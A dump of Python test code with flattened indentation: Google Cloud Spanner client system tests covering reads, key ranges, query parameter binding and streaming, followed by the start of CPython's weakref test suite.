with temp_db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE, MY_COLUMNS, self.ALL, index="contacts_by_last_name"
)
)
expected = list(
reversed([(row[0], row[2]) for row in self._row_data(row_count)])
)
self._check_rows_data(rows, expected)
def test_read_w_single_key(self):
# [START spanner_test_single_key_read]
row_count = 40
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(0,)])))
all_data_rows = list(self._row_data(row_count))
expected = [all_data_rows[0]]
self._check_row_data(rows, expected)
# [END spanner_test_single_key_read]
def test_empty_read(self):
# [START spanner_test_empty_read]
row_count = 40
self._set_up_table(row_count)
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(40,)])))
self._check_row_data(rows, [])
# [END spanner_test_empty_read]
def test_read_w_multiple_keys(self):
row_count = 40
indices = [0, 5, 17]
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE,
self.COLUMNS,
KeySet(keys=[(index,) for index in indices]),
)
)
all_data_rows = list(self._row_data(row_count))
expected = [row for row in all_data_rows if row[0] in indices]
self._check_row_data(rows, expected)
def test_read_w_limit(self):
row_count = 3000
limit = 100
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL, limit=limit))
all_data_rows = list(self._row_data(row_count))
expected = all_data_rows[:limit]
self._check_row_data(rows, expected)
def test_read_w_ranges(self):
row_count = 3000
start = 1000
end = 2000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
single_key = KeyRange(start_closed=[start], end_open=[start + 1])
keyset = KeySet(ranges=(single_key,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start : start + 1]
self._check_rows_data(rows, expected)
closed_closed = KeyRange(start_closed=[start], end_closed=[end])
keyset = KeySet(ranges=(closed_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start : end + 1]
self._check_row_data(rows, expected)
closed_open = KeyRange(start_closed=[start], end_open=[end])
keyset = KeySet(ranges=(closed_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start:end]
self._check_row_data(rows, expected)
open_open = KeyRange(start_open=[start], end_open=[end])
keyset = KeySet(ranges=(open_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end]
self._check_row_data(rows, expected)
open_closed = KeyRange(start_open=[start], end_closed=[end])
keyset = KeySet(ranges=(open_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end + 1]
self._check_row_data(rows, expected)
def test_read_partial_range_until_end(self):
row_count = 3000
start = 1000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[start:],
("start_closed", "end_open"): [],
("start_open", "end_closed"): all_data_rows[start + 1 :],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [start], end_arg: []}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_partial_range_from_beginning(self):
row_count = 3000
end = 2000
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[: end + 1],
("start_closed", "end_open"): all_data_rows[:end],
("start_open", "end_closed"): [],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [], end_arg: [end]}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_with_range_keys_index_single_key(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start = 3
krange = KeyRange(start_closed=data[start], end_open=data[start + 1])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : start + 1])
def test_read_with_range_keys_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : end + 1])
def test_read_with_range_keys_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start:end])
def test_read_with_range_keys_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end + 1])
def test_read_with_range_keys_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end])
def test_read_with_range_keys_index_limit_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start:end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_and_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_closed = KeyRange(start_closed=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_open = KeyRange(start_closed=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start:end]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_closed = KeyRange(start_open=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_open = KeyRange(start_open=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end]
self.assertEqual(rows, expected)
def test_partition_read_w_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
committed = self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
union = []
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
batches = batch_txn.generate_read_batches(
self.TABLE, columns, KeySet(all_=True), index="name"
)
for batch in batches:
p_results_iter = batch_txn.process(batch)
union.extend(list(p_results_iter))
self.assertEqual(union, expected)
batch_txn.close()
def test_execute_sql_w_manual_consume(self):
row_count = 3000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
streamed = snapshot.execute_sql(self.SQL)
keyset = KeySet(all_=True)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
self.assertEqual(list(streamed), rows)
self.assertEqual(streamed._current_row, [])
self.assertEqual(streamed._pending_chunk, None)
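    # Shared assertion helper: run the SQL in a fresh snapshot and compare rows,
    # appending ORDER BY pkey for determinism unless order=False or the SQL
    # already contains an ORDER clause.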
def _check_sql_results(
self, database, sql, params, param_types, expected, order=True
):
if order and "ORDER" not in sql:
sql += " ORDER BY pkey"
with database.snapshot() as snapshot:
rows = list(
snapshot.execute_sql(sql, params=params, param_types=param_types)
)
self._check_rows_data(rows, expected=expected)
def test_multiuse_snapshot_execute_sql_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.execute_sql(self.SQL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.execute_sql(self.SQL))
self._check_row_data(after, all_data_rows)
def test_execute_sql_returning_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 'a' AS C1, 1 AS C2 "
"UNION ALL SELECT 'b' AS C1, 2 AS C2) "
"ORDER BY C1 ASC)"
)
self._check_sql_results(
self._db,
sql=sql,
params=None,
param_types=None,
expected=[[[["a", 1], ["b", 2]]]],
)
def test_execute_sql_returning_empty_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 2 AS C1) X "
"JOIN (SELECT 1 AS C2) Y "
"ON X.C1 = Y.C2 "
"ORDER BY C1 ASC)"
)
self._db.snapshot(multi_use=True)
self._check_sql_results(
self._db, sql=sql, params=None, param_types=None, expected=[[[]]]
)
def test_invalid_type(self):
table = "counters"
columns = ("name", "value")
valid_input = (("", 0),)
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, valid_input)
invalid_input = ((0, ""),)
with self.assertRaises(exceptions.FailedPrecondition):
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, invalid_input)
def test_execute_sql_select_1(self):
self._db.snapshot(multi_use=True)
# Hello, world query
self._check_sql_results(
self._db,
sql="SELECT 1",
params=None,
param_types=None,
expected=[(1,)],
order=False,
)
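    # Exercise parameter binding for one type code: non-null scalar, NULL scalar,
    # array, empty array, and NULL array values.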
def _bind_test_helper(
self, type_name, single_value, array_value, expected_array_value=None
):
self._db.snapshot(multi_use=True)
# Bind a non-null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": single_value},
param_types={"v": Type(code=type_name)},
expected=[(single_value,)],
order=False,
)
# Bind a null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": Type(code=type_name)},
expected=[(None,)],
order=False,
)
# Bind an array of <type_name>
array_type = Type(code=TypeCode.ARRAY, array_element_type=Type(code=type_name))
if expected_array_value is None:
expected_array_value = array_value
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": array_value},
param_types={"v": array_type},
expected=[(expected_array_value,)],
order=False,
)
# Bind an empty array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": []},
param_types={"v": array_type},
expected=[([],)],
order=False,
)
# Bind a null array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": array_type},
expected=[(None,)],
order=False,
)
def test_execute_sql_w_string_bindings(self):
self._bind_test_helper(TypeCode.STRING, "Phred", ["Phred", "Bharney"])
def test_execute_sql_w_bool_bindings(self):
self._bind_test_helper(TypeCode.BOOL, True, [True, False, True])
def test_execute_sql_w_int64_bindings(self):
self._bind_test_helper(TypeCode.INT64, 42, [123, 456, 789])
def test_execute_sql_w_float64_bindings(self):
self._bind_test_helper(TypeCode.FLOAT64, 42.3, [12.3, 456.0, 7.89])
def test_execute_sql_w_float_bindings_transfinite(self):
# Find -inf
self._check_sql_results(
self._db,
sql="SELECT @neg_inf",
params={"neg_inf": NEG_INF},
param_types={"neg_inf": param_types.FLOAT64},
expected=[(NEG_INF,)],
order=False,
)
# Find +inf
self._check_sql_results(
self._db,
sql="SELECT @pos_inf",
params={"pos_inf": POS_INF},
param_types={"pos_inf": param_types.FLOAT64},
expected=[(POS_INF,)],
order=False,
)
def test_execute_sql_w_bytes_bindings(self):
self._bind_test_helper(TypeCode.BYTES, b"DEADBEEF", [b"FACEDACE", b"DEADBEEF"])
def test_execute_sql_w_timestamp_bindings(self):
import pytz
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
timestamp_1 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 12, nanosecond=345612789
)
timestamp_2 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 13, nanosecond=456127893
)
timestamps = [timestamp_1, timestamp_2]
# In round-trip, timestamps acquire a timezone value.
expected_timestamps = [
timestamp.replace(tzinfo=pytz.UTC) for timestamp in timestamps
]
self._recurse_into_lists = False
self._bind_test_helper(
TypeCode.TIMESTAMP, timestamp_1, timestamps, expected_timestamps
)
def test_execute_sql_w_date_bindings(self):
import datetime
dates = [SOME_DATE, SOME_DATE + datetime.timedelta(days=1)]
self._bind_test_helper(TypeCode.DATE, SOME_DATE, dates)
@unittest.skipIf(USE_EMULATOR, "Skipping NUMERIC")
def test_execute_sql_w_numeric_bindings(self):
self._bind_test_helper(TypeCode.NUMERIC, NUMERIC_1, [NUMERIC_1, NUMERIC_2])
def test_execute_sql_w_query_param_struct(self):
name = "Phred"
count = 123
size = 23.456
height = 188.0
weight = 97.6
record_type = param_types.Struct(
[
param_types.StructField("name", param_types.STRING),
param_types.StructField("count", param_types.INT64),
param_types.StructField("size", param_types.FLOAT64),
param_types.StructField(
"nested",
param_types.Struct(
[
param_types.StructField("height", param_types.FLOAT64),
param_types.StructField("weight", param_types.FLOAT64),
]
),
),
]
)
# Query with null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": None},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (None, None, None, None)},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, nested NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.nested.weight",
params={"r": (None, None, None, (None, None))},
param_types={"r": record_type},
expected=[(None,)],
order=False,
)
# Query with non-null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (name, count, size, (height, weight))},
param_types={"r": record_type},
expected=[(name, count, size, weight)],
order=False,
)
# Query with empty struct, explicitly empty type
empty_type = param_types.Struct([])
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": ()},
param_types={"r": empty_type},
expected=[(False,)],
order=False,
)
# Query with null struct, explicitly empty type
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": None},
param_types={"r": empty_type},
expected=[(True,)],
order=False,
)
# Query with equality check for struct value
struct_equality_query = (
"SELECT " '@struct_param=STRUCT<threadf INT64, userf STRING>(1,"bob")'
)
struct_type = param_types.Struct(
[
param_types.StructField("threadf", param_types.INT64),
param_types.StructField("userf", param_types.STRING),
]
)
self._check_sql_results(
self._db,
sql=struct_equality_query,
params={"struct_param": (1, "bob")},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with nullness test for struct
self._check_sql_results(
self._db,
sql="SELECT @struct_param IS NULL",
params={"struct_param": None},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with null array-of-struct
array_elem_type = param_types.Struct(
[param_types.StructField("threadid", param_types.INT64)]
)
array_type = param_types.Array(array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": None},
param_types={"struct_arr_param": array_type},
expected=[],
order=False,
)
# Query with non-null array-of-struct
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": [(123,), (456,)]},
param_types={"struct_arr_param": array_type},
expected=[(123,), (456,)],
order=False,
)
# Query with null array-of-struct field
struct_type_with_array_field = param_types.Struct(
[
param_types.StructField("intf", param_types.INT64),
param_types.StructField("arraysf", array_type),
]
)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, None)},
param_types={"struct_param": struct_type_with_array_field},
expected=[],
order=False,
)
# Query with non-null array-of-struct field
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, ((456,), (789,)))},
param_types={"struct_param": struct_type_with_array_field},
expected=[(456,), (789,)],
order=False,
)
# Query with anonymous / repeated-name fields
anon_repeated_array_elem_type = param_types.Struct(
[
param_types.StructField("", param_types.INT64),
param_types.StructField("", param_types.STRING),
]
)
anon_repeated_array_type = param_types.Array(anon_repeated_array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT CAST(t as STRUCT<threadid INT64, userid STRING>).* "
"FROM UNNEST(@struct_param) t",
params={"struct_param": [(123, "abcdef")]},
param_types={"struct_param": anon_repeated_array_type},
expected=[(123, "abcdef")],
order=False,
)
# Query and return a struct parameter
value_type = param_types.Struct(
[
param_types.StructField("message", param_types.STRING),
param_types.StructField("repeat", param_types.INT64),
]
)
value_query = (
"SELECT ARRAY(SELECT AS STRUCT message, repeat "
"FROM (SELECT @value.message AS message, "
"@value.repeat AS repeat)) AS value"
)
self._check_sql_results(
self._db,
sql=value_query,
params={"value": ("hello", 1)},
param_types={"value": value_type},
expected=[([["hello", 1]],)],
order=False,
)
def test_execute_sql_returning_transfinite_floats(self):
with self._db.snapshot(multi_use=True) as snapshot:
# Query returning -inf, +inf, NaN as column values
rows = list(
snapshot.execute_sql(
"SELECT "
'CAST("-inf" AS FLOAT64), '
'CAST("+inf" AS FLOAT64), '
'CAST("NaN" AS FLOAT64)'
)
)
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], float("-inf"))
self.assertEqual(rows[0][1], float("+inf"))
# NaNs cannot be compared by equality.
self.assertTrue(math.isnan(rows[0][2]))
# Query returning array of -inf, +inf, NaN as one column
rows = list(
snapshot.execute_sql(
"SELECT"
' [CAST("-inf" AS FLOAT64),'
' CAST("+inf" AS FLOAT64),'
' CAST("NaN" AS FLOAT64)]'
)
)
self.assertEqual(len(rows), 1)
float_array = rows[0][0]
self.assertEqual(float_array[0], float("-inf"))
self.assertEqual(float_array[1], float("+inf"))
# NaNs cannot be searched for by equality.
        self.assertTrue(math.isnan(float_array[2]))

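    # A hedged aside on the assertions above (an illustrative sketch, not a
    # system test; the helper name is ours): IEEE-754 NaN compares unequal to
    # every value, including itself, so assertEqual can never match a NaN
    # column and math.isnan() is the reliable check.
    @staticmethod
    def _nan_comparison_sketch():
        nan = float("nan")
        assert nan != nan          # equality always fails for NaN
        assert math.isnan(nan)     # NaN must be detected via isnan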
def test_partition_query(self):
row_count = 40
sql = "SELECT * FROM {}".format(self.TABLE)
committed = self._set_up_table(row_count)
        # Partitioned queries do not support ORDER BY
all_data_rows = set(self._row_data(row_count))
union = set()
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
for batch in batch_txn.generate_query_batches(sql):
p_results_iter = batch_txn.process(batch)
            # Lists aren't hashable, so convert each result row to a tuple
rows = [tuple(result) for result in p_results_iter]
union.update(set(rows))
self.assertEqual(union, all_data_rows)
batch_txn.close()
class TestStreamingChunking(unittest.TestCase, _TestData):
@classmethod
def setUpClass(cls):
from tests.system.utils.streaming_utils import INSTANCE_NAME
from tests.system.utils.streaming_utils import DATABASE_NAME
instance = Config.CLIENT.instance(INSTANCE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
database = instance.database(DATABASE_NAME)
        if not database.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
cls._db = database
def _verify_one_column(self, table_desc):
sql = "SELECT chunk_me FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
def _verify_two_columns(self, table_desc):
sql = "SELECT chunk_me, chunk_me_2 FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
self.assertEqual(row[1], expected)
def test_four_kay(self):
from tests.system.utils.streaming_utils import FOUR_KAY
self._verify_one_column(FOUR_KAY)
def test_forty_kay(self):
from tests.system.utils.streaming_utils import FORTY_KAY
self._verify_one_column(FORTY_KAY)
def test_four_hundred_kay(self):
from tests.system.utils.streaming_utils import FOUR_HUNDRED_KAY
self._verify_one_column(FOUR_HUNDRED_KAY)
def test_four_meg(self):
from tests.system.utils.streaming_utils import FOUR_MEG
self._verify_two_columns(FOUR_MEG)
class CustomException(Exception):
"""Placeholder for any user-defined exception."""
class _DatabaseDropper(object):
"""Helper for cleaning up databases created on-the-fly."""
def __init__(self, db):
self._db = db
def delete(self):
self._db.drop()
class _ReadAbortTrigger(object):
"""Helper for tests provoking abort-during-read."""
KEY1 = "key1"
KEY2 = "key2"
def __init__(self):
self.provoker_started = threading.Event()
self.provoker_done = threading.Event()
self.handler_running = threading.Event()
self.handler_done = threading.Event()
def _provoke_abort_unit_of_work(self, transaction):
keyset = KeySet(keys=[(self.KEY1,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
assert len(rows) == 1
row = rows[0]
value = row[1]
self.provoker_started.set()
self.handler_running.wait()
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY1, value + 1]])
def provoke_abort(self, database):
database.run_in_transaction(self._provoke_abort_unit_of_work)
self.provoker_done.set()
def _handle_abort_unit_of_work(self, transaction):
keyset_1 = KeySet(keys=[(self.KEY1,)])
rows_1 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_1))
assert len(rows_1) == 1
row_1 = rows_1[0]
value_1 = row_1[1]
self.handler_running.set()
self.provoker_done.wait()
keyset_2 = KeySet(keys=[(self.KEY2,)])
rows_2 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_2))
assert len(rows_2) == 1
row_2 = rows_2[0]
value_2 = row_2[1]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY2, value_1 + value_2]]
)
def handle_abort(self, database):
database.run_in_transaction(self._handle_abort_unit_of_work)
self.handler_done.set()
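# A hedged usage sketch for _ReadAbortTrigger (illustrative only, not run by
# the suite; the function name is ours): the provoker and handler transactions
# execute on two threads, and the Event handshakes above force their reads to
# overlap so that Spanner aborts and retries the handler. A `database` object
# and a seeded counters table are assumptions of this sketch.
def _read_abort_sketch(database):
    trigger = _ReadAbortTrigger()
    provoker = threading.Thread(target=trigger.provoke_abort, args=(database,))
    handler = threading.Thread(target=trigger.handle_abort, args=(database,))
    provoker.start()
    handler.start()
    provoker.join()
    handler.join()
    # Both units of work committed exactly once despite the forced abort.
    assert trigger.provoker_done.is_set() and trigger.handler_done.is_set()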
class FauxCall(object):
def __init__(self, code, details="FauxCall"):
self._code = code
self._details = details
def initial_metadata(self):
return {}
def trailing_metadata(self):
return {}
def code(self):
return self._code
def details(self):
return self._details
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper, ALWAYS_EQ
# Used in ReferencesTestCase.test_ref_created_during_del().
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
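# A hedged usage sketch (not itself a test; the function name is ours):
# collect_in_thread() is meant to wrap mutation-heavy loops so that
# gc.collect() races against them from a background thread, surfacing
# thread-safety bugs in the weak containers.
def _collect_in_thread_sketch():
    d = weakref.WeakValueDictionary()
    with collect_in_thread():
        for i in range(1000):
            d[i % 10] = RefCycle()  # values become trash while gc runs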
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
